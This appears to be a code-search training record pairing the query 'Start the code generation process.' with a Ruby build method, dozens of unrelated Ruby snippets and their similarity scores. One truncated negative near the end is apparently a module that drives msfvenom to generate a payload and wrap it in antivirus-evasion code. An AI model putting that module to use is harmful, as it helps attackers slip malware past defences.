"def writeCompiledFile(tokens, classNames, outFile)\n resultList = compileClass2(tokens, classNames)\n str = resultList[0]\n classTable = resultList[1]\n methodsTableList = resultList[2]\n vmFile = File.new(outFile, \"w\")\n\n vmFile.syswrite(str)\n\n #will print the symbol tables commented out in the vm file\n str = \"\\n\\n//class symbol table\\n\" + classTable.printTable+\"\\n\\n\"\n for i in 0..methodsTableList.size-1\n str += \"//method's symbol table\\n\" + methodsTableList[i].printTable+\"\\n\\n\"\n end\n\n vmFile.syswrite(str)\nend",
"def genWritables(model, outRoot)\n firstRecord = model.records.values.first\n pyPackage, base, packagePath = DataMetaDom::PojoLexer::assertNamespace(firstRecord.name)\n # Next: replace dots with underscores.The path also adjusted accordingly.\n #\n # Rationale for this, quoting PEP 8:\n #\n # Package and Module Names\n #\n # Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves\n # readability. Python packages should also have short, all-lowercase names, although the use of underscores\n # is discouraged.\n #\n # Short and all-lowercase names, and improving readability if you have complex system and need long package names,\n # is \"discouraged\". Can't do this here, our system is more complicated for strictly religous, \"pythonic\" Python.\n # A tool must be enabling, and in this case, this irrational ruling gets in the way.\n # And dots are a no-no, Python can't find packages with complicated package structures and imports.\n #\n # Hence, we opt for long package names with underscores for distinctiveness and readability:\n pyPackage = pyPackage.gsub('.', '_')\n packagePath = packagePath.gsub('/', '_')\n destDir = File.join(outRoot, packagePath)\n FileUtils.mkdir_p destDir\n wriOut = nil # File.open(File.join(destDir, \"#{writableClassName(base)}.py\"), 'wb')\n serFile = File.join(destDir, 'serial.py')\n FileUtils.rm serFile if File.file?(serFile)\n ioOut = File.open(serFile, 'wb') # one huge serialization file\n ioOut.puts %|# This file is generated by DataMeta DOM. Do not edit manually!\n#package #{pyPackage}\n\nfrom hadoop.io import WritableUtils, InputStream, OutputStream, Text\nfrom ebay_datameta_core.base import DateTime\nfrom decimal import *\nfrom collections import *\nfrom bitarray import bitarray\nfrom ebay_datameta_hadoop.base import *\nfrom model import *\n\n|\n begin\n model.records.values.each { |e|\n _, base, _ = DataMetaDom::PojoLexer::assertNamespace(e.name)\n case\n when e.kind_of?(DataMetaDom::Record)\n genWritable model, wriOut, ioOut, e, pyPackage, base\n else\n raise \"Unsupported Entity: #{e.inspect}\"\n end\n }\n ensure\n begin\n ioOut.close\n ensure\n #wriOut.close\n end\n end\n end",
"def write_to_file\n file = File.open(@filename_erl,\"a\")\n file.puts @head, @erl, @sig_sub\n file.puts @sub if @@sub_struct_flag\n (file.puts @un_arr.uni_def, @un_arr.uni_func, @un_arr.uni_func_2) if @@union_flag\n (file.puts @un_arr.arr_def, @un_arr.arr_func) if @@dyn_array_flag\n file.close\n File.open(@filename_hrl, \"a\") {|f| f.puts @const, @enum, @hrl}\n end",
"def write_models_to_file\n Printer.new(models, @output_dir).tap do |p|\n p.write\n end\n end",
"def write_module_artifact(filename,content = nil)\n if namespace\n content = indent(content).chomp\n content = \"module #{namespace.capitalize}\\n#{content}\\nend\\n\"\n end\n \n write_artifact(filename,content)\n end",
"def mode=(new_mode)\n LOGGER.mode = new_mode\n end",
"def mode=(new_mode)\n LOGGER.mode = new_mode\n end",
"def write_project_packages\n puts \"Processing project\"\n\n def package_name_from_file(file)\n dirs = File.dirname(file).split(\"/\").reverse\n i = dirs.index(\"src\") || dirs.index(\"tests\") || dirs.index(\"model-src\")\n i && dirs[0..i-1].reverse.join(\".\")\n end\n\n project_classes = []\n Find.find(Dir.pwd) do |file|\n if File.expand_path(file) == File.expand_path(\"project\")\n Find.prune\n elsif file =~ /.*\\.scala$/ then\n IO.readlines(file).each do |line|\n if line =~ /\\s*(class|trait|object)\\s*(\\w+)\\s*(private)?\\s*(((extends)|(with))\\s+\\w+\\s*)*(\\{|\\[|\\(|$)/ then\n if package_name_from_file(file) then \n project_classes << [$2, package_name_from_file(file)]\n end\n end\n end\n end\n end\n\n File.open($project_packages_file, \"w\") do |f|\n project_classes.uniq.each do |x|\n klass, pckg = x\n f.puts(\"#{klass}\\t#{pckg}\")\n end\n end\nend",
"def configure(mode, compiler, path)\n # @config controls the compilation of a C Program\n @config = {\n # Use which compiler to compile the program\n generator: compiler,\n # Store the binary file to where\n path: path\n }\n\n # @mode can be :default, :quiet, :verbose, :help, :compile_only\n @mode = mode\n end",
"def write_files(cases, laws)\n File.write(@prefix+\"redlatam_cases.json\", JSON.pretty_generate(cases))\n File.write(@prefix+\"redlatam_laws.json\", JSON.pretty_generate(laws))\n File.write(@prefix+\"redlatam_cases.csv\", gen_csv(@prefix+\"redlatam_cases.json\", @case_h))\n File.write(@prefix+\"redlatam_laws.csv\", gen_csv(@prefix+\"redlatam_laws.json\", @law_h))\n end",
"def to_code\n\t\tprefix = [ \n\t\t\t\"#!/usr/bin/ruby\", \n\t\t\t\"system( \\\"#{self.to_scaffold}\\\")\", \n\t\t\t\"Dir.chdir \\\"#{self.name}\\\"\" \n\t\t]\n\n\t\tself.klasses.reduce( prefix) { |m,klass| \n\t\t\tm << \"system( \\\"#{klass.to_scaffold}\\\")\" << klass_to_file(klass)\n\t\t} << \"rake db:create\" << \"rake db:migrate\"\n\tend",
"def file_mode\n super | 0o111\n end",
"def write(filename_or_type=:can, out_options={})\n if filename_or_type.is_a?(Symbol)\n write_string(filename_or_type, out_options)\n else\n write_file(filename_or_type, out_options)\n end\n end",
"def outfile\n return name + ProjectType::filename_suffix(type)\n end",
"def create_model_files\n template 'model.rb', File.join('app/models/mokio', class_path, \"#{file_name}.rb\")\n end",
"def genFileContent(cls, bld)\n\n # Add in any dependencies required by functions\n for fun in cls.functions\n if fun.elementId == CodeElem::ELEM_FUNCTION\n if fun.isTemplate\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\n if templ != nil\n templ.process_dependencies(cls, bld, fun)\n else\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\n end\n end\n end\n end\n\n Utils.instance.genUses(cls.uses, bld)\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.startBlock(\"namespace \" << cls.namespace.get(\".\"))\n end\n\n classDec = cls.model.visibility + \" interface \" + Utils.instance.getStyledClassName(cls.name)\n\n for par in (0..cls.baseClassModelManager.size)\n if par == 0 && cls.baseClasses[par] != nil\n classDec << \" : \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n elsif cls.baseClasses[par] != nil\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n end\n end\n\n bld.startClass(classDec)\n\n bld.endClass\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.endBlock(\" // namespace \" + cls.namespace.get(\".\"))\n bld.add\n end\n end",
"def auto_output(mode = nil)\n mode.nil? ? @state.toggle_auto_output : @state.auto_output = mode\n end",
"def genFileContent(cls, bld)\n bld.separate\n\n for inc in cls.includes\n bld.add(\"require '\" << inc.path << inc.name << \".\" << Utils.instance.getExtension(\"body\"))\n end\n\n bld.separate\n\n render_namespace_starts(cls, bld)\n\n inheritFrom = \"\"\n\n if cls.baseClasses.length > 0\n inheritFrom = \" < \" + Utils.instance.getClassTypeName(cls.baseClasses[0])\n end\n\n if cls.baseClasses.length > 1\n Log.error(\"Ruby doesn't support multiple inheritance\")\n end\n\n bld.startClass(\"class \" + getClassName(cls) + inheritFrom)\n\n accessors = Accessors.new\n # Do automatic static array size declairations at top of class\n process_var_accessors(accessors, cls, bld, cls.model.varGroup)\n\n add_accessors(\"attr_accessor\", accessors.both, bld)\n add_accessors(\"attr_attr_reader\", accessors.readers, bld)\n add_accessors(\"attr_attr_writer\", accessors.writers, bld)\n\n bld.separate\n\n # Do automatic static array size declairations at top of class\n process_var_group(cls, bld, cls.model.varGroup)\n\n bld.separate\n # Generate code for functions\n for fun in cls.functions\n process_function(cls, bld, fun)\n end\n\n bld.endClass\n render_namespace_ends(cls, bld)\n end",
"def generate_options(filename, code); end",
"def generate_options(filename, code); end",
"def mode=(a_mode)\n @@mode = a_mode.to_sym\n end",
"def write(output = T.unsafe(nil), indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write(output = T.unsafe(nil), indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write_file(*args)\n end",
"def output_ext\n end",
"def write(output, indent); end",
"def mode=(val)\n if val.blank? or val.kind_of? Fixnum then\n write_attribute(:mode, val)\n else\n write_attribute(:mode, Mode[val])\n end\n end",
"def write(output, indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write(output, indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def get_module_definition_file\n check_and_create_directory\n file_name = \"#{@output_dir}/#{@profile_name.downcase}/#{@module_definition_file_name}\"\n File.new(file_name, 'w')\n end",
"def generate_file_files( options, files, classes )\n\t\tdebug_msg \"Generating file documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'filepage.rhtml'\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tfiles.sort_by {|k,v| k }.each do |path, fileinfo|\n\t\t\toutfile = @outputdir + fileinfo[:outfile]\n\t\t\tdebug_msg \" working on %s (%s)\" % [ path, outfile ]\n\t\t\trel_prefix = @outputdir.relative_path_from( outfile.dirname )\n\t\t\tcontext = binding()\n\n\t\t\tdebug_msg \" rendering #{outfile}\"\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def generate_class_files( options, files, classes )\n\t\tdebug_msg \"Generating class documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'classpage.rhtml'\n\t\toutputdir = @outputdir\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tclasses.sort_by {|k,v| k }.each do |classname, classinfo|\n\t\t\tdebug_msg \" working on %s (%s)\" % [ classname, classinfo[:outfile] ]\n\t\t\toutfile = outputdir + classinfo[:outfile]\n\t\t\trel_prefix = outputdir.relative_path_from( outfile.dirname )\n\t\t\tsvninfo = self.get_svninfo( classinfo )\n\n\t\t\tdebug_msg \" rendering #{outfile}\"\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def output_file(type)\n if (type == :html)\n \"#{DirMap.public}#{News.public_path}/#{self.filename}.html\"\n else\n \"#{DirMap.public}#{News.public_path}/#{self.filename}.html\"\n end\n end",
"def save_as_ruby(file)\n if File.exist?(file)\n text = File.read(file)\n save_as_ruby_sub!(text, :version, 'VERSION')\n save_as_ruby_sub!(text, :released, 'RELEASED', 'DATE')\n save_as_ruby_sub!(text, :codename, 'CODENAME')\n else\n t = []\n t << %[module #{codename}]\n t << %[ VERSION = \"#{version}\"]\n t << %[ RELEASE = \"#{release}\"]\n t << %[ CODENAME = \"#{codename}\"]\n t << %[end]\n text = t.join(\"\\n\")\n end\n File.open(file, 'w'){ |f| f << text }\n end",
"def generate_class_files( options, files, classes )\n\t\tdebug_msg \"Generating class documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'classpage.rhtml'\n\t\toutputdir = @outputdir\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tclasses.sort_by {|k,v| k }.each do |classname, classinfo|\n\t\t\tdebug_msg \" working on %s (%s)\" % [ classname, classinfo[:outfile] ]\n\t\t\toutfile = outputdir + classinfo[:outfile]\n\t\t\trel_prefix = outputdir.relative_path_from( outfile.dirname )\n\t\t\tsvninfo = self.get_svninfo( classinfo )\n\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def output_file(type)\n if (type == :html)\n \"#{DirMap.html_views}/snippets/nav-list.html.erb\"\n else\n \"#{DirMap.html_views}/snippets/nav-list.html.erb\"\n end\n end",
"def set_mode(m)\n @mode = m\n end",
"def pop_mode(mode = nil)\n m = super(mode)\n if ModeTag[m] then\n output_indentation\n @logger.debug \"</#{ModeTag[m]}>\\n\"\n @output << \"</#{ModeTag[m]}>\\n\" unless mode == :table and skip_tables?\n end\n end",
"def mode=(mode)\n Nitro.mode = mode.to_sym\n end",
"def modes= m\n m.instance_eval \"def to_s; self.join(','); end\" if m.is_a?(Array) #override to_s\n @modes = m\n end",
"def writer; end",
"def genFileContent(cls, bld)\r\n bld.startClass(\"class \" + getClassName(cls))\r\n\r\n bld.separate\r\n # Generate code for class variables\r\n eachVar(uevParams().wCls(cls).wBld(bld).wSeparate(true).wVarCb(lambda { |var| }))\r\n\r\n bld.separate\r\n # Generate code for functions\r\n render_functions(cls, bld)\r\n\r\n bld.endClass\r\n end",
"def code_gen(destination = nil, syntax)\n code = syntax == :scss ? @tree.to_scss : @tree.to_sass\n return code unless destination\n if destination.is_a?(String)\n open_file(destination, 'w') { |file| file.write(code) }\n else\n destination.write(code)\n end\n end",
"def write_default_files\n templates = load_templates\n File.open('controller.rb', 'w') { |f| f.write(templates[:controller]) }\n File.open('README.md', 'w') { |f| f.write(templates[:readme]) }\n File.open('index.html.erb', 'w') { |f| f.write(templates[:index]) }\n File.open('Gemfile', 'w') { |f| f.write(templates[:gemfile]) }\nend",
"def output_ext(_ext); end",
"def output_ext(_ext); end",
"def mode\n options[:mode]\n end",
"def output_ext(ext); end",
"def mode=(mode)\n @mode = mode ? mode.to_sym : nil\n end",
"def write(output, indent = T.unsafe(nil)); end",
"def write_java\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n dir = \"#{ @path }/src/#{ @pkg.gsub '.', '/' }\";\n cls = \"#{ @name }.java\"\n pth = File.join(dir,cls)\n open(pth,'w') { |f| f.puts j.gsub(' ','') }\n end",
"def write_traits(output_file)\n open(output_file, 'a') { |f|\n f.puts \"=========#{@generation}========\"\n @all_persons.each do |person|\n f.puts \"#{person.get_chromosome.get_sequence}\"\n end\n }\n end",
"def mode=(type)\n @mode = type.to_s\n end",
"def mode(*modes, &block)\n modes.each do |mode|\n @modes[mode] ||= {}\n @modes[mode][:function] = block\n end\n end",
"def write_swift(swift, section)\n filename = \"section-#{section.to_s.rjust(3, '0')}.swift\"\n @contents_sections << %Q{<code source-file-name=\"#{filename}\"/>}\n\n File.write(@output + \"/#{filename}\", swift)\n end",
"def generate name, file\n require 'erb'\n template = File.read(File.join(File.dirname(__FILE__), \"class_template.erb\"))\n erb = ERB.new(template)\n code = erb.result(binding)\n Dir.mkdir(@basedir) unless File.directory?(@basedir)\n file = File.join(@basedir, name + \".rb\")\n File.open(file, \"w+\") do |f|\n f.puts code\n end\n end",
"def catenate( target_file, *source_files )\n\ttrace \"Catenating modules to form %s\" % [ target_file ]\n\tFile.open( target_file, 'w:utf-8' ) do |target|\n\t\tsource_files.each do |source|\n\t\t\ttrace \" #{source}...\"\n\t\t\ttarget.puts( File.read(source, encoding: 'utf-8') )\n\t\tend\n\tend\nend",
"def output(data, classname)\n sanitized = File.join(@output, classname.gsub('::', '/')).downcase\n path = Pathname(sanitized).dirname\n FileUtils.mkdir_p path.to_s unless path.exist?\n\n File.open(\"#{sanitized}.json\", \"w\") do |f|\n f.write(JSON.pretty_generate(data))\n end\n end",
"def mode=(_arg0); end"
] |
[
"0.61586547",
"0.60897255",
"0.56814134",
"0.5643226",
"0.5630379",
"0.5551736",
"0.55042124",
"0.5504173",
"0.5431309",
"0.53551745",
"0.53501123",
"0.534584",
"0.5301392",
"0.5222702",
"0.5208211",
"0.51636547",
"0.51636547",
"0.51636547",
"0.51636547",
"0.5163312",
"0.51422054",
"0.5136278",
"0.51256686",
"0.5091445",
"0.5084237",
"0.5079875",
"0.5060857",
"0.5060857",
"0.5060857",
"0.50295794",
"0.50209576",
"0.49975348",
"0.4993485",
"0.49741283",
"0.4970659",
"0.49550736",
"0.49350762",
"0.49239424",
"0.49211982",
"0.49174708",
"0.49167994",
"0.4916625",
"0.4907093",
"0.49019587",
"0.488748",
"0.48849508",
"0.48849508",
"0.48776552",
"0.48663574",
"0.4857576",
"0.48552376",
"0.4843799",
"0.48422986",
"0.48409843",
"0.48267764",
"0.482181",
"0.48217982",
"0.4819834",
"0.48118502",
"0.48118502",
"0.4811351",
"0.48111376",
"0.48111376",
"0.4804972",
"0.48045075",
"0.4801326",
"0.4794214",
"0.47901195",
"0.47901195",
"0.47884065",
"0.4786469",
"0.4780142",
"0.47779512",
"0.4758776",
"0.47576624",
"0.4754578",
"0.47480986",
"0.47445172",
"0.47334135",
"0.4731863",
"0.47253576",
"0.47250393",
"0.4716566",
"0.47090155",
"0.46985096",
"0.4683884",
"0.4683884",
"0.4679823",
"0.46774676",
"0.46774098",
"0.46743602",
"0.46632925",
"0.46624732",
"0.46564966",
"0.4647387",
"0.46439543",
"0.46412814",
"0.46363848",
"0.4635549",
"0.46330923"
] |
0.62678695
|
0
|
Start the code generation process.
|
def build
raise ConfigurationError.new("Must specify working directory") unless @working_dir
raise ConfigurationError.new("Must specify which sources to wrap") unless @parser
Logger.info "Beginning code generation"
@builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)
@builder.add_includes @options[:includes]
@builder.build
@builder.sort
Logger.info "Code generation complete"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start_generation\n Nanite.request(\"/nanny/generate\", self.id)\n end",
"def start\n # Set a cleaner process title\n Process.setproctitle(\"generate #{ARGV.join(\" \")}\")\n\n # Parse CLI arguments\n parser.parse!\n\n # Render Apache portal config\n view = View.new(context)\n rendered_template = view.render(template.read)\n output.write(rendered_template)\n rescue\n $stderr.puts \"#{$!.to_s}\"\n $stderr.puts \"Run 'generate --help' to see a full list of available options.\"\n exit(false)\n end",
"def do_generate(in_background = true)\n update_attributes(:generation_start_time => Time.now)\n logs.create(:message => 'Started generate process')\n generation_started!\n \n generate_rails!\n logs.create(:message => 'Generated Rails')\n \n remove_unwanted_files!\n logs.create(:message => 'Removed unwanted files')\n \n scm_object.initialize_repository\n logs.create(:message => \"Initialized #{scm} repository\")\n \n scm_object.install_plugins\n logs.create(:message => \"Installed #{selected_plugins.count} plugins\")\n \n if capify\n system(\"cd ../#{self.underscored_name} && Capify .\")\n logs.create(:message => \"Capified with Capistrano\")\n end\n \n scm_object.track_all_files\n logs.create(:message => \"Tracked all files\")\n \n scm_object.push_to_server\n logs.create(:message => \"Pushed files to server. Generation completed.\")\n \n update_attributes(:generation_stop_time => Time.now)\n logs.create(:message => 'Finished generate process')\n generation_completed!\n end",
"def start_run; end",
"def generate\n require_relative \"resume/ruby_version_checker\"\n RubyVersionChecker.check_ruby_version\n require_relative \"resume/cli/application\"\n CLI::Application.start\n end",
"def start\n unpack_scripts if File.exist?(DEFLATE_SCRIPT_PATH)\n # Load PSDK Scripts\n if File.exist?(index_filename)\n load_script_from_index\n else\n File.open(SCRIPT_INDEX_PATH, 'w') do |file|\n load_vscode_scripts(VSCODE_SCRIPT_PATH, file)\n end\n end\n # Load RMXP Scripts\n load_rmxp_scripts\n # Load Project Scripts\n load_vscode_scripts(PROJECT_SCRIPT_PATH) if index_filename == SCRIPT_INDEX_PATH\n end",
"def process\n self.generate\n end",
"def perform\n begin\n name = \"rbx-ffi-generators-#{@label}\"\n source = File.expand_path name + @platform.source_ext\n target = File.expand_path name + @platform.executable_ext\n\n File.open source, \"wb\" do |f|\n @subject.source f\n end\n\n if preparer = @subject.prepare(source, target)\n handle preparer, :prepare_failed\n else\n target = source\n end\n\n processor = @subject.process target\n return handle(processor, :process_failed)\n ensure\n remove source, target\n end\n end",
"def run\n start = Time.now\n log \"[0/3] Generating build\"\n generate_build\n\n log \"[1/3] Building\"\n filename = build\n\n log \"[2/3] Parsing\"\n\n @config[:parser].parse(filename)\n log \"[3/3] Complete\"\n\n Time.now - start\n end",
"def start\n require 'irbtools'\n end",
"def gen\n with_output_to @fn do\n pp \"require 'spqr/spqr'\"\n pp \"require 'spqr/app'\"\n\n pp \"\"\n\n @scs.each do |sc|\n pp(\"require '#{sc.package.gsub(/[.]/, '/')}/#{sc.name}'\")\n end\n\n \n pp \"\"\n \n pp \"app = SPQR::App.new(:loglevel => :debug)\"\n \n klass_list = @scs.collect do |sc|\n (sc.package.split(\".\").collect{|pkg| pkg.capitalize} << sc.name).join(\"::\")\n end\n \n pp \"app.register #{klass_list.join ','}\"\n \n pp \"\"\n\n pp \"app.main\"\n end\n end",
"def start\n configure\n run\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n loop do\n run\n end\n end",
"def start\n end",
"def start\n end",
"def start\n\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def run!\n @application.load_configuration_file_or_read_the_options!(@options)\n case\n when options.include?(:show_heuristics?)\n list_heuristics!\n when options.include?(:generate_file)\n Generator.new(options)\n else\n @application.run_global_commands!\n start_continuous_testing!\n end\n end",
"def to_code\n\t\tprefix = [ \n\t\t\t\"#!/usr/bin/ruby\", \n\t\t\t\"system( \\\"#{self.to_scaffold}\\\")\", \n\t\t\t\"Dir.chdir \\\"#{self.name}\\\"\" \n\t\t]\n\n\t\tself.klasses.reduce( prefix) { |m,klass| \n\t\t\tm << \"system( \\\"#{klass.to_scaffold}\\\")\" << klass_to_file(klass)\n\t\t} << \"rake db:create\" << \"rake db:migrate\"\n\tend",
"def start\r\n @proc.call\r\n end",
"def start()\n\n\t\tend",
"def start\n end",
"def generate\n end",
"def generate\n puts \"current path should be: \" + PATH_SCRIPT + \"/core\"\n result = false\n Dir.chdir(PATH_SCRIPT+\"/core\") do\n result = call_system_command(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n Dir.chdir(PATH_SCRIPT+\"/is\") do\n result = system(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n return result\n end",
"def generate\n setup\n\n write_style_sheet\n generate_index\n generate_class_files\n generate_file_files\n generate_table_of_contents\n @json_index.generate\n @json_index.generate_gzipped\n\n copy_static\n\n rescue => e\n debug_msg \"%s: %s\\n %s\" % [\n e.class.name, e.message, e.backtrace.join(\"\\n \")\n ]\n\n raise\n end",
"def compile\n prep\n client.setup_run_context\n end",
"def generate!\n generator.invoke_all\n end",
"def generate_data!\n start_dir = Dir.pwd\n \n Dir.chdir tool_path\n system \"./generate -pc #{product_factor} -fn #{filename} -fc\"\n ensure\n Dir.chdir start_dir\n end",
"def generate\n end",
"def execute!\n make_web_directory\n generate_universe\n generate_html\n print_success_message\n end",
"def starten\n create_fox_components\n instance_final_activate\n activate\n end",
"def generate\n if @options.dry_run then\n # do nothing\n @generator.generate\n else\n Dir.chdir @options.op_dir do\n unless @options.quiet then\n $stderr.puts \"\\nGenerating #{@generator.class.name.sub(/^.*::/, '')} format into #{Dir.pwd}...\"\n end\n\n @generator.generate\n update_output_dir '.', @start_time, @last_modified\n end\n end\n end",
"def start\n # create output folder (recursively) if it doesn't exist yet, but only if it's actually defined\n unless @options[:output_folder].nil?\n FileUtils.mkpath(@options[:output_folder]) unless File.directory?(@options[:output_folder])\n end\n \n UI.info(\"Guard::Steering has started watching your files with output folder set to '#{@output_folder}' (in case of 'nil' templates will be compiled to the folder where they are)\") unless @options[:quiet]\n\n run_all if @options[:run_at_start]\n end",
"def program\n @compile\n end",
"def start\n build_all_assets \"Building all assets\"\n end",
"def start\n \n\tend",
"def process(code, context)\n compiler = Verneuil::Compiler.new\n program = compiler.compile(code)\n # p program\n Verneuil::Process.new(program, context)\nend",
"def start()\n source_in = File.new(@file, \"r\")\n read_source(source_in)\n\n # Pad with spaces if necessary\n if !@nopad\n pad()\n end\n\n execute()\n end",
"def start\n create('start')\n end",
"def generate; end",
"def generate; end",
"def generate(scripts)\n require 'uncool/app'\n\n app = App.new(options)\n\n output = app.generate(scripts)\n\n $stdout.puts(output)\n end",
"def generator\n printf(\"%-10s %s\\n\",\"generator:\", \"generating.. (*hdls, *bmm, *scr, *prj)\")\n exitcode = 1\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/hdl/*.vhd\")\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/synthesis/*.vhd\")\n File.symlink(\"../pcores\", \"#{TMPDIR}/pcores\") unless File.symlink?(\"#{TMPDIR}/pcores\")\n pipe = IO.popen(\"platgen -od #{TMPDIR}/ -p xc4vfx100ff1152-10 -lang vhdl ../system.mhs\", \"r+\")\n # pipe = IO.popen(\"platgen -p xc4vfx12ff668-10 system.mhs\", \"r+\")\n pipe.each do |line|\n # puts line\n # do not synthesize\n if line =~ /Running XST synthesis/\n exitcode = 0\n Process.kill 'TERM', pipe.pid\n break\n end\n end\n unless exitcode == 0\n p \"# Error with platgen - check platgen.log\"\n exit\n end\n\n # he generated files under $PROJECT/TMPDIR/{hdl,synthesis}\n # copy them to $PROJECT/hdl/ under certain conditions (size differs & or abstence)\n FileUtils.mkdir('hdl') unless File.directory? 'hdl'\n FileUtils.mkdir('synthesis') unless File.directory? 'synthesis'\n FileUtils.mkdir_p(BMM_RESULTSDIR) unless File.directory? BMM_RESULTSDIR # output directory\n\n # move_files_if(\"#{TMPDIR}/hdl/*.vhd\")\n move_files_if(\"#{TMPDIR}/implementation/#{TOPLEVEL}.bmm\", BMM_RESULTSDIR)\n move_files_if(\"#{TMPDIR}/synthesis/*.scr\" )\n move_files_if(\"#{TMPDIR}/synthesis/*.prj\")\n Find.find(\"#{TMPDIR}/hdl\") do |path|\n move_files_if(path) if File.file? path\n end\n\n # move logfiles to scratch\n FileUtils.mkdir_p(GEN_SCRATCHDIR) unless File.directory? GEN_SCRATCHDIR\n [\"platgen.log\", \"platgen.opt\", \"#{TMPDIR}/clock_generator*.log\"].each { |t|\n FileUtils.mv(t, \"#{GEN_SCRATCHDIR}/\") if File.file? t\n }\n\n # change timestamps\n\nend",
"def start\n\t\tend",
"def start_run\n # Abstract\n end",
"def start_run\n # Abstract\n end",
"def start\n @running = true\n gen_threads = start_generators\n writer = start_writer\n gen_threads.each(&:join)\n kill_proccess\n writer.join\n end",
"def run\n init\n\n printer = config.flamegraph? ? Printers::Flamegraph : Printers::Simple\n\n at_exit do\n File.write(build_path(), JSON.dump(result)) if config.json?\n printer.dump(result)\n end\n\n start\n end",
"def start\n yield\n end",
"def run\n puts \"\\nHere we go!\\n\\n\"\n make_output_directory\n build_jar\n create_android\n include_www\n generate_manifest\n copy_libs\n add_name_to_strings\n write_java\n puts \"\\nDone!\\n\\n\"\n `open #{@output_dir}`\n end",
"def start\n yield self if block_given?\n classpath = self.classpath.is_a?(Array) ? self.classpath : []\n start_process(classpath)\n end",
"def start\n backend.start\n end",
"def generate\n CfnMonitor::Generate.run(options)\n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def start\n assign_globals\n register_space\n start_message\n build_actions\n start_threads\n end",
"def run(inname, outname)\n\tgenerated = gen inname\n\n\tcopy_dependencies inname, outname, generated\n\n\tFile.write outname, generated\nend",
"def run\n # Change the working directory to the directory of this script.\n Dir.chdir(File.dirname(__FILE__)) \n\n # if LIST_TECHNIQUES is true, just output available evasion techniques.\n if datastore['LIST_TECHNIQUES'] == true\n print_available_techniques()\n else\n payload = datastore['PAYLOAD']\n payload_options = datastore['PAYLOAD_OPTIONS']\n output_directory = datastore['OUTPUT_DIRECTORY']\n executable_name = datastore['EXECUTABLE_NAME']\n evasion_stack = datastore['EVASION_STACK']\n msfvenom_path = datastore['MSFVENOM_PATH']\n\n if payload == nil\n print_error(\"PAYLOAD must be set.\")\n return \n end\n if output_directory == nil \n print_error(\"OUTPUT_DIRECTORY must be set.\")\n return\n end\n if executable_name == nil \n print_error(\"EXECUTABLE_NAME must be set.\") \n return\n end\n if msfvenom_path == \"\"\n # Guess at path to msfvenom\n msfvenom_path = Dir.pwd[0..(Dir.pwd.index(\"pro\")+3)]+\"msf3/msfvenom\"\n print_status(\"MSFVENOM_PATH not specified. Hoping msfvenom can be found at \"+msfvenom_path+\".\")\n end\n\n binary_generated = generate_binary(msfvenom_path, payload, payload_options)\n if binary_generated\n print_status(\"Payload binary generated successfully.\")\n print_status(\"Generating evasive source from generated binary.\")\n\n generate_evasive_source(evasion_stack)\n\n executable_generated = generate_executable(output_directory+\"/\"+executable_name)\n\n if executable_generated\n print_status(\"Executable successfully generated.\")\n else\n print_error(\"Unable to generate executable.\")\n end\n else\n print_error(\"Payload generation with msfvenom failed.\")\n end\n\n print_status(\"Cleaning up temporary files.\")\n\n if File.exist?('tmp/bin'+self.uuid+'.c')\n File.delete('tmp/bin'+self.uuid+'.c')\n end\n if File.exist?('tmp/evasive'+self.uuid+'.c')\n 